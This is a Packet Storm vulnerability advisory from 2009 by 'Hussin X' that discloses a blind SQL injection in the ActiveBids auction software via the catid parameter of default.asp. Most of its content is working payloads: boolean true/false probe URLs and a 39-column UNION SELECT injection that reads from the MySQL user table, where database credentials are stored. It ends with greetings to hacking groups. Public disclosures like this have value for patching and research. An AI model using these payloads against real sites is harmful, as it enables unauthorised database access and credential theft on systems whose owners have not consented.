ActiveBids Blind SQL Injection

2009-11-18T00:00:00
ID PACKETSTORM:82726
Type packetstorm
Reporter Hussin X
Modified 2009-11-18T00:00:00

Description

                                        
                                            `ActiveBids (default.asp) Blind SQL Injection Vulnerability  
____________________________________  
  
Author : Hussin X  
  
Home : www.IQ-TY.com  
  
email : hussin.x@gmail.com  
____________________________________  
  
Vendor : http://www.activewebsoftwares.com  
Demo :  
_______  
  
http://server/default.asp?catid=39+and+1=1 ( true )  
  
http://server/default.asp?catid=39+and+1=0 ( false )  
  
:: test ::  
  
http://server/default.asp?catid=39+UNION%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39+from+mysql.user  
  
Greetz :  
WwW.IQ-ty.CoM  
  
| CraCkEr | Cyber-Zone | str0ke | jiko   
`